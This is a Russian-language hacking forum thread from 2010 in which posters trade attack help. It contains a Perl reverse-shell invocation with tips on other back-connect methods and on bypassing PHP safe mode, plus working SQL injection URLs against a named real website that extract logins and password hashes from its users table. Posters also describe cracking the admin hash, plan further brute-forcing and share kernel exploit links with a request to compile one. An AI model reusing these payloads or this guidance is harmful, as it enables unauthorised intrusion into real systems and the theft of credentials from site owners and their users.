 |
|
12.02.2010, 19:22
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от Pashkela
а как пробовал запускать уже?
perl back.pl [ip] 53
|
|
|
12.02.2010, 19:29
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
а ты попробуй через бинарник сишный, баш, другой порт, бекконект встроенный в WSO2 тот же - отличная вещь, как практика показывает
PS: Порт повыше бери
Последний раз редактировалось Pashkela; 12.02.2010 в 19:34..
|
|
|
|
12.02.2010, 19:50
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
Если включен сейф-мод, то надо обходить, запуском бинарного бека вместо перлового - не обойдешь СМ.
|
|
|
|
12.02.2010, 23:20
|
|
Постоянный
Регистрация: 22.11.2008
Сообщений: 344
С нами:
9192645
Репутация:
570
|
|
Можно ли выполнить комманду если:
Код:
Disable functions : symlink, dl, shell_exec, exec, system, passthru, popen, proc_open, proc_nice, proc_get_status, proc_close, proc_terminate, posix_mkfifo, set_time_limit, imap_open, imap_body,imap_list, imap_createmailbox, imap_deletemailbox, imap_renamemailbox, mb_send_mail
|
|
|
|
13.02.2010, 00:05
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами:
8854580
Репутация:
34
|
|
http://www.pogoda.ua/index.php?id=6209+and+1=0+union+select+0,1,2,3,4--
там скуль четвертой версии...я пробрутил названия таблиц..толку мало...можно ли че-нить сделать ?!
|
|
|
|
13.02.2010, 00:47
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
С нами:
9520453
Репутация:
124
|
|
Сообщение от daniel_1024
http://www.pogoda.ua/index.php?id=6209+and+1=0+union+select+0,1,2,3,4--
там скуль четвертой версии...я пробрутил названия таблиц..толку мало...можно ли че-нить сделать ?!
Вполне себе существует таблица users с полями login и password:
Код:
http://www.pogoda.ua/index.php?id=-1+union+select+0,concat_ws(0x3a,login,password),2,3,4+from+users--
Уж к чему-то, но они подходят.
Кроме того, прокатывает запрос вида:
Код:
http://www.pogoda.ua/index.php?id=-1+union+select+0,'1',2,3,4--
Подозреваю, что разрешены кавычки, но не уверен - попробовал прочитать файл через load_file(), - не вышло. Думаю, из-за того что файловых прав нет.
|
|
|
|
13.02.2010, 03:21
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
С нами:
9140897
Репутация:
90
|
|
2.6.25 есть эксплоит?
|
|
|
|
13.02.2010, 03:37
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
http://milw0rm.com/sploits/2009-linux-sendpage2.tar.gz
|
|
|
|
13.02.2010, 10:24
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
Извините за глупость... Помогите скомпилить сплойт,желательно под винду, но и линухом не побрезгую. Ну не знаю я си (
http://milw0rm.com/exploits/98
Заранее благодарен. |
|
|
|
13.02.2010, 13:51
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
С нами:
9520453
Репутация:
124
|
|
Сообщение от Strilo4ka
http://www.pogoda.ua/admin/login.php может поможет
хеш странный
Не знаю, у меня его замечательно расшифровал passcracking.ru . Проблема в том, что этот логин\пароль к админке не подошёл. Нужно дальше таблицы брутить.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1896825){kind=avatar}
Похожие темы
Линейный вид
